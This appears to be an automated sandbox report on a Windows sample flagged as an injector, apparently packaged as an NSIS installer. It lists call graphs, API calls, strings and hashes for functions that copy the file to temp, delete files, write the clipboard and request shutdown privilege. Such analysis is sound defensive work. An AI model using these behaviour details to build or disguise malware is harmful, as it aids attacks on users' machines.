40626e 17 API calls 3910->3911 3911->3903 3911->3906 3911->3908 3911->3910 3912 405831 2 API calls 3911->3912 3913 4037c3 CloseHandle 3911->3913 3912->3911 3913->3911 3914->3838 3915->3840 3917 4064e0 5 API calls 3916->3917 3919 403318 3917->3919 3918 403322 3918->3846 3919->3918 3920 405b1d 3 API calls 3919->3920 3921 40332a 3920->3921 3922 4057fc 2 API calls 3921->3922 3923 403330 3922->3923 3924 405d6d 2 API calls 3923->3924 3925 40333b 3924->3925 3925->3846 4022 405d3e GetFileAttributesW CreateFileW 3926->4022 3928 402f01 3929 402f11 3928->3929 4023 40624c lstrcpynW 3928->4023 3929->3853 3931 402f27 3932 405b69 2 API calls 3931->3932 3933 402f2d 3932->3933 4024 40624c lstrcpynW 3933->4024 3935 402f38 GetFileSize 3950 403034 3935->3950 3953 402f4f 3935->3953 3937 40303d 3937->3929 3939 40306d GlobalAlloc 3937->3939 4037 4032f5 SetFilePointer 3937->4037 3938 4032df ReadFile 3938->3953 4036 4032f5 SetFilePointer 3939->4036 3940 4030a0 3944 402e5d 6 API calls 3940->3944 3943 403088 3946 4030fa 35 API calls 3943->3946 3944->3929 3945 403056 3947 4032df ReadFile 3945->3947 3951 403094 3946->3951 3949 403061 3947->3949 3948 402e5d 6 API calls 3948->3953 3949->3929 3949->3939 4025 402e5d 3950->4025 3951->3929 3951->3951 3952 4030d1 SetFilePointer 3951->3952 3952->3929 3953->3929 3953->3938 3953->3940 3953->3948 3953->3950 3955 406626 5 API calls 3954->3955 3956 40396e 3955->3956 3957 403974 3956->3957 3958 403986 3956->3958 4046 406193 wsprintfW 3957->4046 3959 40611a 3 API calls 3958->3959 3960 4039b6 3959->3960 3962 4039d5 lstrcatW 3960->3962 3964 40611a 3 API calls 3960->3964 3963 403984 3962->3963 4038 403c30 3963->4038 3964->3962 3967 405c25 18 API calls 3970 403a07 3967->3970 3968 403a9b 3969 405c25 18 API calls 3968->3969 3971 403aa1 3969->3971 3970->3968 3972 40611a 3 API calls 3970->3972 3974 403ab1 LoadImageW 3971->3974 3975 40626e 17 API calls 3971->3975 3973 403a39 3972->3973 3973->3968 3978 403a5a lstrlenW 3973->3978 3981 405b4a CharNextW 3973->3981 3976 403b57 3974->3976 3977 403ad8 RegisterClassW 3974->3977 3975->3974 3980 40140b 2 API calls 3976->3980 3979 403b0e SystemParametersInfoW CreateWindowExW 3977->3979 4009 403b61 3977->4009 3982 403a68 lstrcmpiW 3978->3982 3983 403a8e 3978->3983 3979->3976 3984 403b5d 3980->3984 3985 403a57 3981->3985 3982->3983 3986 403a78 GetFileAttributesW 3982->3986 3987 405b1d 3 API calls 3983->3987 3989 403c30 18 API calls 3984->3989 3984->4009 3985->3978 3988 403a84 3986->3988 3990 403a94 3987->3990 3988->3983 3991 405b69 2 API calls 3988->3991 3992 403b6e 3989->3992 4047 40624c lstrcpynW 3990->4047 3991->3983 3994 403b7a ShowWindow 3992->3994 3995 403bfd 3992->3995 3997 4065b6 3 API calls 3994->3997 3996 405383 5 API calls 3995->3996 3999 403c03 3996->3999 3998 403b92 3997->3998 4000 403ba0 GetClassInfoW 3998->4000 4003 4065b6 3 API calls 3998->4003 4001 403c07 3999->4001 4002 403c1f 3999->4002 4005 403bb4 GetClassInfoW RegisterClassW 4000->4005 4006 403bca DialogBoxParamW 4000->4006 4008 40140b 2 API calls 4001->4008 4001->4009 4004 40140b 2 API calls 4002->4004 4003->4000 4004->4009 4005->4006 4007 40140b 2 API calls 4006->4007 4007->4009 4008->4009 4009->3909 4010->3859 4011->3890 4012->3898 4014 403898 4013->4014 4015 40388a CloseHandle 4013->4015 4049 4038c5 4014->4049 4015->4014 4018 40595a 67 API calls 4019 4036b3 OleUninitialize 4018->4019 4019->3866 4019->3867 4020->3899 4021->3911 4022->3928 4023->3931 4024->3935 4026 402e66 4025->4026 4027 402e7e 4025->4027 4028 402e76 4026->4028 4029 402e6f DestroyWindow 4026->4029 4030 402e86 4027->4030 4031 402e8e GetTickCount 4027->4031 4028->3937 4029->4028 4032 406662 2 API calls 4030->4032 4033 402e9c CreateDialogParamW ShowWindow 4031->4033 4034 402ebf 4031->4034 4035 402e8c 4032->4035 4033->4034 4034->3937 4035->3937 4036->3943 4037->3945 4039 403c44 4038->4039 4048 406193 wsprintfW 4039->4048 4041 403cb5 4042 403ce9 18 API calls 4041->4042 4044 403cba 4042->4044 4043 4039e5 4043->3967 4044->4043 4045 40626e 17 API calls 4044->4045 4045->4044 4046->3963 4047->3968 4048->4041 4050 4038d3 4049->4050 4051 40389d 4050->4051 4052 4038d8 FreeLibrary GlobalFree 4050->4052 4051->4018 4052->4051 4052->4052

                                            Executed Functions

                                            Function 0040333D Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412stringfilecomCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 40333d-40337a SetErrorMode GetVersion 1 40337c-403384 call 406626 0->1 2 40338d 0->2 1->2 8 403386 1->8 3 403392-4033a6 call 4065b6 lstrlenA 2->3 9 4033a8-4033c4 call 406626 * 3 3->9 8->2 16 4033d5-403436 #17 OleInitialize SHGetFileInfoW call 40624c GetCommandLineW call 40624c GetModuleHandleW 9->16 17 4033c6-4033cc 9->17 24 403440-40345a call 405b4a CharNextW 16->24 25 403438-40343f 16->25 17->16 22 4033ce 17->22 22->16 28 403460-403466 24->28 29 403571-40358b GetTempPathW call 40330c 24->29 25->24 31 403468-40346d 28->31 32 40346f-403473 28->32 36 4035e3-4035fd DeleteFileW call 402ec1 29->36 37 40358d-4035ab GetWindowsDirectoryW lstrcatW call 40330c 29->37 31->31 31->32 34 403475-403479 32->34 35 40347a-40347e 32->35 34->35 38 403484-40348a 35->38 39 40353d-40354a call 405b4a 35->39 57 403603-403609 36->57 58 4036ae-4036be call 403880 OleUninitialize 36->58 37->36 54 4035ad-4035dd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40330c 37->54 43 4034a5-4034de 38->43 44 40348c-403494 38->44 55 40354c-40354d 39->55 56 40354e-403554 39->56 47 4034e0-4034e5 43->47 48 4034fb-403535 43->48 45 403496-403499 44->45 46 40349b 44->46 45->43 45->46 46->43 47->48 52 4034e7-4034ef 47->52 48->39 53 403537-40353b 48->53 60 4034f1-4034f4 52->60 61 4034f6 52->61 53->39 62 40355c-40356a call 40624c 53->62 54->36 54->58 55->56 56->28 64 40355a 56->64 65 40369e-4036a5 call 40395a 57->65 66 40360f-40361a call 405b4a 57->66 75 4037e4-4037ea 58->75 76 4036c4-4036d4 call 4058ae ExitProcess 58->76 60->48 60->61 61->48 72 40356f 62->72 64->72 74 4036aa 65->74 77 403668-403672 66->77 78 40361c-403651 66->78 72->29 74->58 80 403868-403870 75->80 81 4037ec-403802 GetCurrentProcess OpenProcessToken 75->81 85 403674-403682 call 405c25 77->85 86 4036da-4036ee call 405819 lstrcatW 77->86 82 403653-403657 78->82 83 403872 80->83 84 403876-40387a ExitProcess 80->84 88 403804-403832 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403838-403846 call 406626 81->89 90 403660-403664 82->90 91 403659-40365e 82->91 83->84 85->58 101 403684-40369a call 40624c * 2 85->101 102 4036f0-4036f6 lstrcatW 86->102 103 4036fb-403715 lstrcatW lstrcmpiW 86->103 88->89 99 403854-40385f ExitWindowsEx 89->99 100 403848-403852 89->100 90->82 95 403666 90->95 91->90 91->95 95->77 99->80 104 403861-403863 call 40140b 99->104 100->99 100->104 101->65 102->103 103->58 106 403717-40371a 103->106 104->80 110 403723 call 4057fc 106->110 111 40371c-403721 call 40577f 106->111 116 403728-403736 SetCurrentDirectoryW 110->116 111->116 118 403743-40376c call 40624c 116->118 119 403738-40373e call 40624c 116->119 123 403771-40378d call 40626e DeleteFileW 118->123 119->118 126 4037ce-4037d6 123->126 127 40378f-40379f CopyFileW 123->127 126->123 128 4037d8-4037df call 406012 126->128 127->126 129 4037a1-4037c1 call 406012 call 40626e call 405831 127->129 128->58 129->126 138 4037c3-4037ca CloseHandle 129->138 138->126
                                            APIs
                                            • SetErrorMode.KERNELBASE ref: 00403360
                                            • GetVersion.KERNEL32 ref: 00403366
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                            • OleInitialize.OLE32(00000000), ref: 004033DD
                                            • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                            • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000,?,00000006,00000008,0000000A), ref: 00403421
                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000020,?,00000006,00000008,0000000A), ref: 00403448
                                              • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                              • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                              • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                            • ExitProcess.KERNEL32 ref: 004036D4
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                            • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
                                            • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                            • ExitProcess.KERNEL32 ref: 0040387A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                            • API String ID: 2488574733-2244295707
                                            • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                            • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                            • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                            • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                            Function 004053EF Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 139 4053ef-40540a 140 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405599-4055a0 139->141 162 4054f5-4054f8 140->162 163 4054d9-4054f3 SendMessageW * 2 140->163 143 4055a2-4055c4 GetDlgItem CreateThread CloseHandle 141->143 144 4055ca-4055d7 141->144 143->144 146 4055f5-4055ff 144->146 147 4055d9-4055df 144->147 151 405601-405607 146->151 152 405655-405659 146->152 149 4055e1-4055f0 ShowWindow * 2 call 404216 147->149 150 40561a-405623 call 404248 147->150 149->146 159 405628-40562c 150->159 156 405609-405615 call 4041ba 151->156 157 40562f-40563f ShowWindow 151->157 152->150 154 40565b-405661 152->154 154->150 164 405663-405676 SendMessageW 154->164 156->150 160 405641-40564a call 4052b0 157->160 161 40564f-405650 call 4041ba 157->161 160->161 161->152 168 405508-40551f call 4041e1 162->168 169 4054fa-405506 SendMessageW 162->169 163->162 170 405778-40577a 164->170 171 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 164->171 178 405521-405535 ShowWindow 168->178 179 405555-405576 GetDlgItem SendMessageW 168->179 169->168 170->159 176 4056a9-4056b9 GetWindowRect 171->176 177 4056bc-4056d1 TrackPopupMenu 171->177 176->177 177->170 181 4056d7-4056ee 177->181 182 405544 178->182 183 405537-405542 ShowWindow 178->183 179->170 180 40557c-405594 SendMessageW * 2 179->180 180->170 185 4056f3-40570e SendMessageW 181->185 184 40554a-405550 call 404216 182->184 183->184 184->179 185->185 186 405710-405733 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 185->186 188 405735-40575c SendMessageW 186->188 188->188 189 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                            • GetClientRect.USER32(?,?), ref: 00405499
                                            • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
                                            • ShowWindow.USER32(?,00000008), ref: 0040553C
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                            • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                              • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                            • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                            • CloseHandle.KERNELBASE(00000000), ref: 004055C4
                                            • ShowWindow.USER32(00000000), ref: 004055E8
                                            • ShowWindow.USER32(?,00000008), ref: 004055ED
                                            • ShowWindow.USER32(00000008), ref: 00405637
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                            • CreatePopupMenu.USER32 ref: 0040567C
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405690
                                            • GetWindowRect.USER32(?,?), ref: 004056B0
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                            • OpenClipboard.USER32(00000000), ref: 00405711
                                            • EmptyClipboard.USER32 ref: 00405717
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                            • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                            • CloseClipboard.USER32 ref: 00405772
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: {$6B
                                            • API String ID: 590372296-3705917127
                                            • Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                            • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                            • Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                            • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                            Function 0040595A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 499 40595a-405980 call 405c25 502 405982-405994 DeleteFileW 499->502 503 405999-4059a0 499->503 504 405b16-405b1a 502->504 505 4059a2-4059a4 503->505 506 4059b3-4059c3 call 40624c 503->506 507 405ac4-405ac9 505->507 508 4059aa-4059ad 505->508 514 4059d2-4059d3 call 405b69 506->514 515 4059c5-4059d0 lstrcatW 506->515 507->504 510 405acb-405ace 507->510 508->506 508->507 512 405ad0-405ad6 510->512 513 405ad8-405ae0 call 40658f 510->513 512->504 513->504 523 405ae2-405af6 call 405b1d call 405912 513->523 516 4059d8-4059dc 514->516 515->516 519 4059e8-4059ee lstrcatW 516->519 520 4059de-4059e6 516->520 522 4059f3-405a0f lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a15-405a1d 522->524 525 405ab9-405abd 522->525 539 405af8-405afb 523->539 540 405b0e-405b11 call 4052b0 523->540 528 405a3d-405a51 call 40624c 524->528 529 405a1f-405a27 524->529 525->507 527 405abf 525->527 527->507 541 405a53-405a5b 528->541 542 405a68-405a73 call 405912 528->542 531 405a29-405a31 529->531 532 405a9c-405aac FindNextFileW 529->532 531->528 535 405a33-405a3b 531->535 532->524 538 405ab2-405ab3 FindClose 532->538 535->528 535->532 538->525 539->512 545 405afd-405b0c call 4052b0 call 406012 539->545 540->504 541->532 546 405a5d-405a66 call 40595a 541->546 551 405a94-405a97 call 4052b0 542->551 552 405a75-405a78 542->552 545->504 546->532 551->532 555 405a7a-405a8a call 4052b0 call 406012 552->555 556 405a8c-405a92 552->556 555->532 556->532
                                            APIs
                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405983
                                            • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059CB
                                            • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059EE
                                            • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059F4
                                            • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A04
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                            • FindClose.KERNEL32(00000000), ref: 00405AB3
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405968
                                            • \*.*, xrefs: 004059C5
                                            • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe", xrefs: 0040595A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-355736728
                                            • Opcode ID: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                            • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                            • Opcode Fuzzy Hash: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                            • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                            Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                            • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
